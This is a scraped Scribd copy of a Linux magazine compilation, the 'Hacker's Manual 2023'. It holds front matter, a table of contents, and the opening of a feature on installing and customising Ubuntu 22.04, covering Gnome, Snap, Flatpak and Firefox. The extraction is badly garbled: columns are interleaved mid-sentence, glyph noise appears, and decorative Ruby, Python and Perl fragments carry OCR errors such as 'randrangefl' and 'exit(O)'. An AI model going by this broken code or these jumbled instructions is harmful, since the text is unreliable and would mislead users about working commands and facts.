100% found this document useful (2 votes)
1K views146 pages

PLC. Hackers Manual 14ed 2023

PLC

Uploaded by

Eduardo Silva
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
100% found this document useful (2 votes)
1K views146 pages

PLC. Hackers Manual 14ed 2023

PLC

Uploaded by

Eduardo Silva
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 146

HACKER’S

MANUAL
•2023
FULL OF
expert
TIPS&
advice

ADVANCE YOUR LINUX SKILLS


•THE KERNEL - NETWORKS
• SERVERS • HARDWARE • SECURITY

148 PAGES OF TUTORIALS


ENHANCE YOUR KNOWLEDGE
WITH IN-DEPTH PROJECTS
Edition
Digital

AND GUIDES
Welcome to the 2023 edition of the Hacker's Manual! You hold in your hands
148 pages of Linux hacking tutorials, guides and features from the experts at
Linux Format magazine - the home of open source software. In this edition
we've gone in hard for security. You'll find guides to securing servers, getting
a grounding in hacking, using security tools such as Kali and Fedora Security
Lab, alongside solid features explaining how to protect your privacy online
using established tools like Tails. But we shouldn't live in fear! Hacking is
monumental fun. Never mind setting up and playing with Linux, we take a
look at hacking tablets, media servers, virtual machines, cloud servers,
multi-booting with Grub and much more. If you're a little timid when it comes
to the Terminal we even have a meaty reference section at the back.
So dive in and enjoy!
HACKER’S
MANUAL
2023
Future PLC Quay House, The Ambury. Bath. BAI 1UA

Editorial
Designer Steve Dacombe
Compiled by Aiden Dalby & Adam Markiewicz
Senior Art Editor Andy Downes
Head of Art & Design Greg Whitaker
Editorial Director Jon White
Photography
All copyrightsand trademarks are recognised and respected

Advertising
Media packs are available on request
Commercial Director Clare Dove
International
Head of Print Licensing Rachel Shaw
licensing@futurenet.com
www.futurecontenthub.com

Circulation
Head of Newstrade Tim Mathers

Production
Head of Production Mark Constance
Production Project Manager Matthew Eglinton
Advertising Production Manager Joanne Crosby
Digital Editions Controller Jason Hudson
Production Managers Keely Miller, Nola Cokely,
Vivienne Calvert, Fran Twentyman

Printed in the UK

Distributed by Marketforce, 5 Churchill Place, Canary Wharf, London. E14 SHU


www.marketforce.co.uk Tel: 0203 787 9001

Hacker’s Manual 2023 Fourteenth Edition (TCB4558)


£ 2023 Future Publishing Limited

We are committed to only using magazine paper which is derived from


responsibly managed, certified forestry and chlorine-free manufacture. The paper in
this bookazine was sourced and produced from sustainable managed forests,
conforming to strict environmental and socioeconomic standards.

All contents © 2023 Future Publishing Limited or published under licence. All rights reserved.
No part of this magazine may be used, stored, transmitted or reproduced in any way without
the prior written permission of the publisher. Future Publishing Limited (company number
2008885) is registered in England and Wales. Registered office: Quay House. The Ambury.
Bath BAI 1UA. All information contained in this publication is for information only and is. as far
as we are aware, correct at the time of going to press. Future cannot accept any responsibility
for errors or inaccuracies in such information. You are advised to contact manufacturers and
retailers directly with regard to the price of products^ervices referred to in this publication. Apps
and websites mentioned in this publication are not under our control. We are not responsible for
their contents or any other changes or updates to them. This magazine is fully independent
and not affiliated in any way with the companies mentioned herein.

FUTURE Connectors.
Creators.
Experience
Makers.

Future pic is a public Chief Executive Zillah Byng-Thorne


company quoted on the Non-Executrve Chairman Richard Huntingford
London Stock Exchange Chief Financial and Strategy Officer Penny Ladkin-Brand
(symbol FMTR)
www.futureplcxom Tel *44 (0)1225 442 244

For press freedom


with responsibility
Contents

HACKER’S
MANUAL
2023
Distros Security
The distro is the core of Linux, so make The best defence is a good offence, but
sure you get the right one. also a good defence.

10 Ubuntu 22.04 46 Protect your privacy


Get the lowdown on the latest Ubuntu release Discover what threats are out there and what
and discover its secrets. you can do to protect your devices.

18 30 years of Linux 54 Kali Linux


How a 21-year-old’s bedroom coding project We take you inside the ultimate hacking
took over the world. toolkit and explain how to use it in anger.

24 Inside the Linux kernel 58 Secure chat clients


How did Linux come to be? What makes it Chat online without anyone snooping in on
tick? We answer all this and more. what you have to say.

32 Build the kernel 64 Lock down Linux


It's the ultimate nerd credential, tune up your We outline the essentials of locking down
own personal kernel, here's how... your Linux boxes for secure networking.

40 Rescatux repair 68 Data recovery


Explore one of the most famous rescue and Recover files from damaged disks and
repair systems powered by Linux. ensure deleted items are gone for good.

72 Key management
Learn how to create a good GnuPG key and
keep it safe from online thieves.

6 | The Hacker's Manual


Contents

Software Hacking
Discover the most powerful Linux Take your Linux skills to
software and get using it. the next level and beyond.

78 OpenELEC 96 Hacker’s toolkit


Get to grips with the media system for Discover the tricks used by hackers
desktops and embedded systems. to help keep your systems safe.

82 Virtual Box 104 Linux on a Linx tablet


Ensure you get the best out of your virtual Get Linux up and running on a low-cost
systems with our essential guide. Windows tablet without the hassle.

86 NextCloud 108 Multi-boot Linux


The break away, all new cloud storage and Discover the inner workings of Grub and boot
document system is live for all. lots of OSes from one PC.

98 NagiOS 112 Build your own custom Ubuntu distro


Industry-level system monitoring so you Why settle for what the existing distrubutions
can track all your Linux PCs. have to offer?

116 LTTng monitoring


Get to know what all your programs are up to
by tracing Linux app activity.

120 USB multi-boot


We explain how you can carry multiple distros
on a single USB drive.

The terminal
Feel like a 1337 hacker and get to grips
with the powerful terminal.

126 Get started 134 Drive partitions


The best way to use the terminal is to dive in Control, edit and create hard drive partitions
with both feet and start using it. and permissions.

128 Files and folders 136 Remote access


We explain how you can navigate the file Set up and access remote GUI applications
system and start manipulating things. using Xll.

130 Edit config files 138 Display control


Discover how you can edit configuration files Sticking with the world of Xll we take some
from within the text terminal. randr for resolution control.

132 System information 140 Core commands


Interrogate the local system to discover all of 20 essential terminal commands that all Linux
its dirty little secrets. web server admins should know.

The Hacker's Manual | 7


- 0) {S j $screc i($star] $star. ], “."); $screen->refi ssh: u sleet: OC~, g- _
^^A B^ I I I jfl
fl A I I I j fl
^^B I Hk
flUA A Ab^A >a.^iBb
IB ^ . I ^^
b a b ■ ।
■ Ifl ■ flflk flB |fl
^fl
A fl fl A A fl A
A fl ^B^^B Bl ■
B^B AB ^A^A Bl ^A^A
H^B^bB fl A BA fl A
Ifl fl fl fl A ^B I fl A [
^^B I I ^B fl fl I
nprocessable_en: ^g^g__^
.g-j—__. _j_. ?. bundle exec rake db:migrate $
BMBIA fl^^flflB 4(flflflflB flP®“AB|
^^A ^^B
fl B
fl fl
ite_attributes(params(:task]) format.html fl Ask^A ■ A ^A fl^se format.html {render action: “edit”} format.json {rei
tec rails generate migration add_priority_to_tasks prioritytinteger S bundle exec rake dbtmigrate $ bundle exec rake dbtmigrate $ bundle exec rails server validate
at, ‘is in the past!’) if due„at < Time.zone.now #!/usr/bin/en python import pygame from random import randrange MAX^STARS = 100 pygame.init() screen = py
:ars = for i in range(MAX_STARS): star = [randrange(0,639), randrange(0,479), randrange(l, 16)] stars.append(star) while True: clock.tick(30) for event in pygame.
numstars = 100; use Time::HiRes qw(usleep); use Curses; Sscreen = new Curses; noecho; curs_set(0); for ($i = 0; $i < Snumstars ; $i++) {$star_x[$i] = rand(80); $s
clear; for ($i = 0; $i < $numstars ; $i++) {$star_x($i] -= $star_s[$i]; if ($star_x($i] < 0) {$star_x($i] = 80;} $screen->addch($star_y($i], $star_x[$i], “.”);} $screen->refre
rent, lest do gem “rspec-rails”, “~> 2.13.0” $ gem install bundle: $ gem install rails -versions.2.12 $ rbenv rehash $ rails new todolist -skip-test-unit respond
nl {redirect_to ©task, notice:'...'} format.json {head :no_content} else format.html {render action: “edit”} format.json {render json: @task.errors, status: :unprc
ity_to_tasks prioritytinteger $ bundle exec rake dbtmigrate $ bundle exec rake dbtmigrate $ bundle exec rails server validate :due_at_is_in_the_past def due_at_is_
>ne.now #!/usr/bin/en python import pygame from random import randrange MAX_STARS = 100 pygame.init() screen = pygame.display.set_mode((640, 480)) c
star = [randrange(0, 639), randrange(0, 479), randrange(l, 16)] stars.append(star) while True: clock.tick(30) for event in pygame.event.get(): if event.type == pyg
tes qw(usleep); use Curses; $screen = new Curses; noecho; curs_set(0); for ($i = 0; $i < Snumstars ; $i++) {$star_x[$i] = rand(80); $star_y{$i] = rand(24); $star_s[$i]
s ; $i++) { $star_x[$i] -= $star_s[$i]; if ($star_x[$i] < 0) { $star_x($i] = 80;} $screen->addch($star_y($i], $star_x{$i], “.”);} $screen->refresh; usleep 50000; gem “then
Is”, “~> 2.13.0” $ gem install bundler $ gem install rails -version=3.2.12 $ rbenv rehash $ rails new todolist -skip-test-unit respond_to do Iformatl if @task.update_
’} format.json {head :no_content} else format.html {render action: “edit”} format.json {render json: ©task.errors, status: :unprocessable_entity} $ bundle exec rails
exec rake db:migrate $ bundle exec rake db:migrate $ bundle exec rails server validate :due_at_is_in_the_past def due_at_is_in_the_past errors.add(:due_at, ‘is in th
rgame from random import randrange MAXJSTARS = 100 pygame.initQ screen = pygame.display.set_mode((640, 480)) clock = pygame.time.Clock() stars = :
s(0, 479), randrange(l, 16)] stars.append(star) while True: clock.tick(30) for event in pygame.event.getQ: if event.type — pygame.QUIT: exit(O) #!/usr/bin/perl $ni
new Curses; noecho: curs_set(0); for ($i = 0; $i < $numstars ; $i++) { $star_x($i] = rand(80); $star_y[$i] = rand(24); $star_s[$i] = rand(4) + 1;} while (1) { Sscreen-
]; if ($star_x[$i] < 0) {$star_x($i] = 80;} $screen->addch($star_y[$i], $star_x{$i], “.”);} $screen->refresh; usleep 50000; gem “therubyracer”, “~> 0.11.4” group :deA
ndler $ gem install rails --version=3.2.12 $ rbenv rehash $ rails new todolist --skip-test-unit respond_to do Iformatl if @task.update_attributes(params[:task]) forma'
nt} else format.html {render action: “edit”} format.json {render json: @task.errors, status: :unprocessable_entity} $ bundle exec rails generate migration add_priori1
exec rake db:migrate S bundle exec rails server validate :due_at_is_in_the_past def due_at_is_in_the_past errors.add(:due_at, ‘is in the past!’) if due_at < Time.zon
ndrange MAXJSTARS = 100 pygame.init() screen = pygame.display.set_mode((640, 480)) clock = pygame.time.Clock() stars = for i in range(MAXJSTARS): star =
md(star) while True: clock.tick(30) for event in pygame.event.get(): if event.type = pygame.QUIT: exit(O) #!/usr/bin/perl Snumstars = 100; use Time::HiRes qw(u<
($i = 0; $i < $numstars ; $i++) { $star_x[$i] = rand(80); $star_y[$i] = rand(24); $star_s[$i] = rand(4) + 1;} while (1) { $screen->clear; for ($i = 0; $i < $numstars ; $i++)
reen->addch($star_y[Si], $star_x($i], “.”);} $screen->refresh; usleep 50000; gem “therubyracer”, “~> 0.11.4” group development, lest do gem “rspec-rails”, “~> 2.13.0
Distros
Because if there was only one
form of Linux, we’d be bored
10 Ubuntu 22.04
Get the lowdown on the latest Ubuntu
release and discover its secrets.
[randrange(O, 639). randrange(O, 479). randrangefl, 16)]
18 30 years of Linux
sleep): use Curses: Sscreen = new Curses; noecho; curs_ How a 21-year-old’s bedroom coding
{Sstar_xf$i] -= $star_s[$i]; if (Sstar ,x[Si] < 0) { $star_x($i] project took over the world.
” $ gem install bundle: $ gem install rails -version=3.2.12
read :no_content} else format.html {render action: “edit” 24 Inside the Linux kernel
migrate $ bundle exec rake db: migrate $ bundle exec rails How did Linux come to be? What makes it
random import randrange MAX-STARS = 100 pygame. tick? We answer all this and more.
efl, 16)] stars.append(star) while True: clock.tick(30) for
curs_set(0); for ($i = 0; $i < $numstars ; $i++) {$star_x[$i] 32 Build the kernel
x[$i] = 80;} $screen->addch($star_y($i], $star_x($i], “.”);} It’s the ultimate nerd credential, tune up
your own personal kernel, here’s how...
on=3.2.12 $ rbenv rehash $ rails new todolist -skip-test-
r action: “edit”} format.json {render json: @task.errors,
40 Rescatux repair
bundle exec rails server validate :due_at_is_in_the_past Explore one of the most famous rescue
PARS = 100 pygame.initO screen = pygame.display.set_ and repair systems powered by Linux.
re: clock.tick(30) for event in pygame.event.get(): if event.
:ars ; $i++) {$star_x[$i] = rand(80); $star_y[$i] = rand(24);
rjyt$i], $star_x[$i], “.”);} $screen->refresh; usleep 50000;
: new todolist -skip-test-unit respond_to do Iformatl if @
rder json: @task.errors, status: :unprocessable_entity} $
:due_at_is_in_the_past def due_at_is_in_the_past errors.
game.display.set_mode((640, 480)) clock = pygame.time.
event.getf): if event.type = pygame.QUIT: exit(0) #!/usr/
tar_y[$i] = rand(24); $star_s[$i] = rand(4) + 1;} while (1) {
sh; usleep 50000; gem “therubyracer”, “~> 0.11.4” group
_to do Iformatl if @task.update_attributes(params[;task])
)cessable_entity} $ bundle exec rails generate migration
,in_the_past errors.add(:due_at, ‘is in the past!’) if due_at
lock = pygame.time.Clock() stars = for i in range(MAX_
ame.QUIT: exit(O) #!/usr/bin/perl $numstars = 100; use
= rand(4) + 1;} while (1) { $screen->clear; for ($i = 0; $i <
rbyracer”, “~> 0.11.4” group development, :test do gem
,attributes(params[:task]) format.html {redirect_to @task,
generate migration add_priority_to_tasks priority:integer
le past!’) if due_at < Time.zone.now #!/usr/bin/en python
for i in range(MAX_STARS): star = [randrangefO, 639),
imstars - 100; use Time::HiRes qw(usleep); use Curses;
>clear; for ($i = 0; $i < Snumstars ; $i++) { $star_x[$i] -=
relopment, lest do gem “rspec-rails”, “~> 2.13.0” $ gem
t.html {redirect_to @task, notice: } format.json {head
y_to_tasks priority:integer S bundle exec rake dbmigrate
e.now #!/usr/bin/en python import pygame from random
[randrangefO, 639), randrangefO, 479), randrangefl, 16)]
sleep); use Curses; Sscreen = new Curses; noecho; curs_ The Hacker's Manual | 9
{ $star_x($i] -= $star_s[$i]; if ($star_x[$i] < 0) { $star_x[$i]
” $ gem install bundle: $ gem install rails -version=3.2.12
Bullet-proof
Ubuntu 22.04
Walpurgis Night is nearly upon us, so cast aside your old OS and begin life
anew with Ubuntu 22.04, says Jonni Bidwell.
ineteen years ago Canonical, led by communication is now carried out by Ard now Canonical is back with a

N dot-com magnate-cum-space tourist


Mark Shuttleworth, unleashed the first
Ubuntu release. It was nothing short of
revolutionary. Suddenly Linux was a thing for
smartphones (some of which run Linux,
but not 'real' Linux). Desktop Linux is alive
and well, but the ecosystem is still not
perfect. An abundance of desktop choices,
brand-new release called Jammy Jellyfish.
It incorporates parts of the latest Gnome
42 desktop. The switch to the Wayland
display protocol has finally happened. The
human beings. Networking worked out of the together with numerous forks of popular new Pipewire multimedia framework is
box, as did a glorious - albeit brown - Gnome distros, have led to complaints about woven into its fabric. And it’s a Long Term
2 desktop. It was built on Debian and inherited fragmentation (from people that don't Support (LTS) release, so you can keep on
that reputation of stability, but it wasn't Debian. understand open source software and using it for five whole years. You won't find
It was something special. free will). And Canonical copped plenty earth shattering user-facing
A huge community rallied around of flack when it abandoned Unity and changes here, but you will
Canonical, which promised that it would the Ubuntu Phone. find a great, reliable OS.
listen. A bespoke bugtracker named But it’s not all bad. Companies Read on to find out
Launchpad was set up, and the first bug have embraced Linux, in why...
filed was "Microsoft has a majority market particular Valve. Its work on
share”. For many, Linux’s golden age was Proton has enabled some 5,000
about to begin, and there was a palpable Windows-only games to be
sense that Bug #1 would soon be fixed. played on Linux. And Ubuntu
Flash forward to today, and you’ll see is still a hugely popular
that not all of those dreams came true. Linux distribution that's
Windows still rules the desktop (though great for playing said gam
MacOS and ChromeOS are swallowing wrangling vital
that up). Casual desktop computing as a documents, or
whole is becoming a niche hobby, because managing
a great deal of our browsing and your clouds.

10 | The Hacker s Manual


Bullet-proof Ubuntu 22.04

Of jams and jellies


It’s Ubuntu LTS time, so let’s see what will be
the shape of Ubuntu for the next few years...
e always look forward to trying out a new

W Ubuntu release. But this time around we’re not


expecting a wildly reinvented desktop
paradigm or huge performance leaps. The previous
Ubuntu LTS, Focal Fossa, after occasionally rocky
beginnings, has been a loyal servant to many of our
machines, and we’re sure Jammy Jellyfish will be a worthy
successor. We're looking forward to Gnome 42 (although
there are some loose ends from earlier releases), a more
polished Wayland experience and we want to see how

C R ED IT: @simonjbutcher
Canonical is pushing ahead with its Snap initiative.
There’s only one problem. At time of writing, it hasn’t
been released. But that’s okay, because it will be by the
time you read this. And if we’re lucky there we won't
have missed any last-minute additions or surprises.
We’ve been testing the daily Jammy Jellyfish images for
a couple of months prior to the official release.
be aware that there’s light and dark versions of the Yaru > The official
Minor niggles, begone! theme, and you'll suspect (rightly) that these have been background
And we've seen quite a bit of change in that time, further tweaked. To be frank, if you’ve been using is over the
page, but these
particularly as parts of the recently released Gnome 42 Ubuntu 21.10, then there’s not anything ground­
Al-generated
start to find their way in. Indeed, as we write this were still breaking in 22.04. But that doesn't mean you shouldn’t
jellyfish by
about a week away from launch day, but since both the upgrade. You should, because if nothing else your
Simon Butcher
Feature and Ul Freeze have passed we don't expect any interim release is about to be EOLd. Oh, and if you're of
are something
drastic changes. We do rather hope some minor niggles the ilk that gets excited by phrases like 'modern design else.
(such as stuttering and occasional crashes trends', then check out the new logo. It's similar to the
while dragging windows between monitors) get sorted old Circle of Friends logo, but on a web3-friendly (stop
out, though. baiting sensible readers! - Ed) rectangular background.
If you've used either of the interim releases (21.04 or If you just want to see what Ubuntu is like, there's no
21.10) since the lasts LTS then you'll be aware that now need to install it at all. Just follow our handy three-step
Ubuntu uses Wayland and (maybe) remember that guide to downloading, writing and booting an Ubuntu
Active Directory can be set up from the installer. You'll USB stick, or DVD if you must.

Download and boot Ubuntu


Cancel Popside

Choose an Image
0 Select the .iso or .img that you want to flash. You can also plug
your USB drives in now.

Choose image

ubuntu-22.04 -beta-desktop-amd64.iso
3.2 GiB

Hash: None

D Download an ISO D Write out a USB stick El Boot Ubuntu


Go to https://ubuntu.com/desktop and Use your favourite image writer (or Your machine might enable you to bring up a
download the ISO file. It's 3.5GB so you may download Balena Etcher from https:// boot menu by pressing F12 or F10 at boot
want to fetch a cup of tea for while you wait. If etcher.io) to write the image to a USB stick. time. If so use this to one-time boot from the
you're interested in trying another flavour, Don't remove the medium until you're told Ubuntu medium. Otherwise you’ll need to go
such as Kubuntu or Lubuntu, you'll find links it’s safe to do so. Bad media will cause into the UEFI/BIOS setup interface and
at https://ubuntu.com/download/flavours. problems later. You could also (using change the boot order. See the official docs at
You’ll also find links to the Server, Pi and Core different software) make a DVD, but this will https://ubuntu.com/tutorials/try-ubuntu-
editions here. be slower than using flash media. before-you-install.

The Hacker’s Manual | 11


Distros

Escape Windows
Whether you’re a complete novice or Windows has driven
you to seek out other operating systems, Ubuntu can help.
indows 11 has been rolled out through the cautions, and a little inconvenient, but it’s the only way to

W Insider program since October 2021. All


Windows 10 users will have been offered the
be sure Windows won't touch your Linux; unplug the
SSD prior to booting to Windows. Yup, it’s hard to
upgrade, in all likelihood, by the time you’re reading
There's nothing like a new Windows release for
remember
this. and potentially awkward to carry out (if your
case is under the desk, say), but at least you can
motivating people to switch to Linux. So here’s a quick describe your install as ‘airgapped from Windows’.
guide for all of you recent Windows apostates. You might instead want to install Ubuntu to an
You may be tempted to dual-boot Windows and external hard drive or USB stick, though if you're not
Ubuntu together. This might sound convenient, but it’s using USB3 storage this won’t be terribly performant.
rich with pitfalls so not something to rush into. Ubuntu Ideally, you’d put it on a whole new machine, but not
will install alongside Windows, but there’s no telling if everyone has a spare, working machine.
down the line Windows Update will, on a whim, decide
the Linux partition(s) is no longer necessary. For this BIOS, meet UEFI
reason we don’t recommend installing both OSes to the Modern PCs use a newer firmware, the Universal
same device. A 250GB SSD is ideal for your first Linux Extensible Firmware Interface, rather than the traditional
explorations, and you can get this new for around £25. BIOS of yore. UEFI machines may have a classic BIOS
Our next prudent bit of guidance is perhaps overly emulation mode, but you almost certainly shouldn't

Get to know Ubuntu’s Gnome desktop

D Activities EJ Applications grid D Status icons


Click on here or press Super This displays all currently installed Network, volume and power
(Windows) to bring up the Activities applications. Type a few characters to indicators. Click to access Bluetooth,
Overview. This will show you previews narrow down the list. You can also find brightness and (for laptops) power
of open windows, which you can drag emoji this way, if they float your boat. profile settings. The logout and
over to the right, to move them to a Oh, and there’s a virtual desktop shutdown options are also here.
new virtual desktop. switcher here too.
D Notification area:
EJDock EJ Desktop options Alerts, such as new software being
This provides easy access to popular Right-click to change either the available or new media that's being
programs. Running applications are background or display settings. You played, are shown here. There’s a
indicated by a red dot. Right-click to can also create desktop folders. calendar too - this can either be used
pin or unpin applications from here. locally or connected with a cloud service.

12 | The Hacker's Manual


Bullet-proof Ubuntu 22.04
enable it. Especially if you already
have OSes installed in UEFI mode
(they will stop working).
Note that PCs these days can be
incredibly fussy about getting into
the UEFI setup or summoning a
boot menu. Precision timing,
multiple reboots, as well as digging
up manuals to find the appropriate
shortcut key may be required. The
Uburtu EFI boot capsules are all
signed by a Microsoft-endorsed key.
so there should be no need to
disable Secure Boot.
One thing you should be aware of
is that one EFI partition is required
to boot a UEFI system. So if you
plan on installing Ubuntu on a separate drive, make sure or voice assistants trying to help you. The Dock area on > Don’t know
the "Device for bootloader installation" is set to the the left-hand side is a nod to Ubuntu's old Unity what to install
original drive, and that the EFI partition is selected. This desktop. The new desktop has been based on Gnome 3 first?
drive will need to be plugged in to boot either OS, but since Ubuntu 18.04, but with some usability tweaks. Let the Snap
you'll be able to choose which from the UEFI. Gnome 3 was seen by some as too ambitious, Store inspire you.
Once you’ve successfully booted Ubuntu, you'll be occasionally buggy, and a memory nog when it was And don’t forget
your updates!
asked whether you want to try Ubuntu or jump right in introduced in 2008 (this commentator even used the
and install it. We'd suggest trying it first, if you haven't phrase “hypermodern"), but these days the fact it forms
already. This enables you to get a feel for the operating the basis for so many desktops is testament to its
system without it touching any of your storage. So you
can t-y out bundled software, install new things and see
if it's right for you. The only downside is that it won't
Using a rock-solid gnome
quite be as performant as the real thing. Oh, and any “The new desktop has been
changes you make will be lost after a reboot, of course.
The annotation {below left) shows you the rudiments of based on Gnome 3 since
Ubuntu’s Gnome desktop.
Just as in other OSes you’ll find folders for your
Ubuntu 18.04, but with some
Documents, Photos and Downloads. But unlike at least
one other OS you won’t be bombarded with marketing
usability tweaks.”
solidity. If you imagine the dock was gone you'll see
what a lot of traditionalists' main problem with Gnome
intUll
is: There's no obvious menu to launch applications. The
Installation type applications grid provided by the Dock isn't quite the
same thing, but if you’re in the habit of using a mouse to
□ fr»* sp«<c ■ vd*l («xt4) ■ vd«2 (btrfi) ■ vd«3 (*xt4) □ free ip*<*
open a traditionally placed applications menu, then your
O«vic* Typ« Mount point Formot? Site Ut«d System
muscle memory will more likely bring you here than to
freeipace 1M8
/dtv/vdil efi 199 MB unknown
the Activities view.
/drv/vda? btrfs I 16000 MB unknown
/dev/vdeJ ext4 /home S27JMB unknown
On a clean install the dock area has shortcuts to
free space i MB
Firefox, Thunderbird and LibreOffice Writer. The
+ Change New Partition Table.. Revert
question mark icon will take you to :he desktop guide,
Device for boot loader installation:
/dtv/vda Virtio Block Device (21.SC8) v which hopefully answers any questions you may have.
Back install Now You'll also find links to Ubuntu Software (the shopping
bag icon), in case you want to install more software, as
• •• • •oo well as the venerable Rhythmbox music player. Internal
and external drives will also show up here, plus there is a
Rubbish Bin from whence deleted files can be retrieved.
> If you know what you want, partition-wise, then the
Something Else option in the installer will help.

Become a Keyboard warrior


In an age of QHD screens and 4K key to bring up the Activities view, your Super+PgUp/RgDown » switch virtual
displays, the mouse cursor’s pilgrimage life in Gnome may be improved {May? - desktops
to the top-left corner can be an arduous Ed) with the following knowledge: Shift+Super+PgUp/PgDown » move
one. This journey can be saved through Ctrl+Super Left/right»tile window window to prev/next workspace
the magic of keyboard shortcuts. Apart left/right Shift+Super Left/Right» move active
from the all-important Super (Windows) Super+A » show applications grid window to prev/next display

The Hacker’s Manual | 13


Distros

Customise Ubuntu
Discover new software. Change settings. Install a new desktop (or three).
buntu (and most other desktop Linux flavours) never heard of. You will, however, find the official Spotify

U have been designed to be intuitive and easy to


learn. However, sooner or later you’ll probably
and Audible programs, as well as unofficial players for
Deezer, YouTube, Google Play Music and Apple Music. If
you prefer something even more nostalgic, you’ll also
want to change some things around. For example, we
think Rhythmbox is great. It’s been the default music find Foobar2000, DeaDBeef-vs (a minimal GTK player
player in Ubuntu since the very beginning (with only a and glorious hex reference) as well as myriad text-based
brief sabbatical while Banshee took its place in 2011). music players. Install Spotify (or whatever else takes
But with its Client Side Decorated window it looks your fancy) by hitting the green button.
dated, and cannot connect to popular (albeit Most applications in the Software application are
proprietary) streaming services so we might want to shipped as Snap packages, You can see the delivery
look at alternatives. By this point we’re assuming mechanism in the Source box in the top-right. Snap is
you’ve installed Ubuntu, and enjoyed its new look Canonical's self-contained packaging format which (like
Flutter-built installer. Flatpak, which is a similar effort) enables developers
Fire up the Ubuntu Software application, scroll down to easily ship software without having to worry about
to the list of categories and select Music and Audio. You'll distro-specific packaging and which versions of which
see a selection of audio programs, most of which we’ve libraries to ship. Snaps also run in a confined sandbox
(unless you give them permission to otherwise) so they
can’t access any files or hardware they don't need to.
Desktop choices Life on the bleeding edge
Occasionally in the Source box you'll see a variety of
There are multiple flavours of Ubuntu 22.04 that include the same rock-solid
different 'channels’ are available for a given Snap. These
foundation as the flagship, but with a different desktop environment. If you like
Ubuntu but don’t like modern Gnome, then Kubuntu, Ubuntu MATE (inspired often enable you to grab a beta or development release,
by Gnome 2) or the lightweight LXQt-powered Lubuntu are well worth your in case you want to live on the bleeding edge. System
time. But rather than install a whole new *buntu, you might prefer to just add a packages are still installed as .deb packages and there
new desktop to the current installation. This is unlikely to break anything, but are still tens of thousands of these traditional packages
the session packages we’ll install include each desktop’s core applications. So you can install from the command line with Apt. These
you might end up with two (or more) file managers, text editors and the like. no longer show up in the Software application, but if you
Some desktops come with their own login manager too. So for example if install Synaptic you can browse these graphically.
you install the kubuntu-desktop package you'll be asked if you want to stick
Canonical has put a lot of effort into making sure
with Gnome's GDM3 or switch to SDDM (which is built using Qt so looks more
popular applications are available in Snap form. Besides
KDE-like). There’s no right or wrong answer, and you can change your mind
SpoWyyou'll find Telegram, Slack, Blender, GIMP and the
with sudo dpkg-reconfigure gdm3 . The other desktop packages are named
similarly, so there's ubuntu-mate-desktop and xubuntu-desktop. Most of
Ixf linuxmagazini ® © » -
these have a more slimmed-down version - for example, kubuntu-core will
install a more minimal set of applications. ® Ixf linux mags — Search with OuckOuckCo
.org

This time, search with:

:❖ & » b O « W ®

★ □ ® ©

£ Enabled

T Facebook Container o c ■■■

□ Facebook Container isolates your Facebook activity from th...

f>o
Firefox Multi-Account Containers C C ...
Multi-Account Containers helps you keep all the parts of yo...

Netflix 1080p © ...


" Forces 1080p playback for Netflix in Firefox. Based on vladi...

uBlock Origin o©

> Installing the whole Kubuntu desktop package makes for a menu > An ad-blocker and Mozilla’s container programs are
that, unsurprisingly, is rich in items that begin with K. essential for the modern Web. And switching the default
search to DuckDuckGo.

14 | The Hacker’s Manual


Bullet-proof Ubuntu 22.04
shell and the browser plugin. That's okay though, for now
you can use a third-party tool, such as Extension
Manager, to do this. This tool is avai able as a Flatpak, so
we'll need to install that and set up the FlatHub repo first.
You might want to do this even if you don't care about
Gnome extensions, since it gives you a whole other
avenue (and tool) by which more software can be
accessed. So open a terminal and run:
$ sudo apt install flatpak gnome-software-plugin-flatpak
gnome-software
$ sudo flatpak remote-add -if-not-exists flathub https://
flathub.org/repo/flathub.flatpakrepo
> What's up, dock? Here we've put the Dock at the bottom,
This add support for Flatpak programs in the Gnome
removed various clutter, and made it shorter.
Software GUI, also installed by the first command. So
PyCharm development environment for Python. There's you’ll be able to search for Extension Manager there after
also open source versions of some classic games, a reboot. Note that Gnome Software is distinct from the
including Prince of Persia (SDLPoP), Open Jed/Knight usual Ubuntu Software tool. It's just called Software and
and Widelands (a Settlers clone). has a shopping bag icon. Alternatively, if you’re enjoying
A big change in this Ubuntu outing is that Firefox is the terminal the required incantation for installing and
only available as a Snap. This comes directly from running (sans need to reboot) is:
Mozilla, saving Canonical a packaging burden (and $ flatpak install com.mattjakeman.ExtensionManager
forcing derivatives such as Linux Mint to build and $ flatpak run com.mattjakeman.ExtensionManager
package their own Firefox'). In our testing, there was a You'll see that Ubuntu uses three Gnome extensions
delay of about 10s each time Firefox was started from (for desktop icons, appindicators and the dock) and that
a clean login. This is mildly annoying since the web two of these can be configured. And if you navigate to the
browser is often the first thing one opens post-login, but Browse tab you can find many more. You might already
hopefully Snap startup times will be worked on in future. have some favourite Gnome extensions,
If the slow-starting Firefox (or Snaps in general) and hopefully most of those have been updated to
bother you. then you can always use the Mozilla PPA to support version 42. Extensions Manager will display
install a traditional package (see https:Z'launchpad. “Unsupported” if not. The popular “Blur my Shell" is
net/~mozillateam/+archive/ubuntu/ppa). Or available. Likewise GSConnect, a Grome-centric take on
download a tarball from its FTP site. Or you could switch the popular KE>E Connect utility for :alking to your phone
to the other side of the modern packaging formats from the desktop.
debate and install Flatpak and Firefox from the Flathub. The shortcut bar on the left isn’t to everyone’s taste,
Your first act will likely be to install uBlock Origin, as well although fans claim it is more efficient than having it
as Mozilla’s Facebook Container and Multi-account along the bottom. You might prefer to get rid of it
Container add-ons. altogether and make the desktop more like the vanilla
A while ago we looked at how Firefox worked on Gnome you'd find in the likes of Fedora. Wherever you
Ubuntu 21.10 (and Fedora 35), and found that the Snap want your dock, it can be configured by starting the
version didn't work at all with VA-API video acceleration. Settings application (either from the menu at the top­
Happily, we were able to get it working in the new version, right or from the Activities Overview) and navigating to
though some extra configuration is required. Go to the Appearance section.
aboutconfig (noting the warning) and set media, The screenshot shows a slightly more orthodox > Ubuntu
ffmpeg.vaapi.enabled to true. Later you may also want to arrangement, except there doesn't seem to be a way to can make
set media.navigator.mediadatadecoder_vpx_enabled as move the Applications Grid shortcut to the left, which is your various
workspaces
well, which will accelerate WebRTC (for example, Zoom, where traditionalists might prefer to find the thing which
work how you
Teams, Jitsi) sessions. In our testing (in Firefox 98, 99and most closely resembles a classical application menu. The
want them to
100 by way of Snap channels) we had to disable the RDD new Dark Theme (which now should work universally)
across multiple
